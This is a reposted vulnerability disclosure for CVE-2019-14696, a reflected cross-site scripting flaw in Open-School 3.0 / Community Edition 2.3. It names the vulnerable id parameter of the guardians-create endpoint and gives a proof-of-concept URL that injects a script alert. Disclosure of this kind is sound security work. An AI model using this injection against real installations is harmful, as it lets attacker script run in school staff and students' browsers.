Advertisement






Open-School 3.0 / Community Edition 2.3 Cross Site Scripting

CVE Category Price Severity
CVE-2019-14696 CWE-79 $300 Medium
Author Risk Exploitation Type Date
John Doe High Remote 2019-08-09
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080031

Below is a copy:

Open-School 3.0 / Community Edition 2.3 Cross Site Scripting
# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.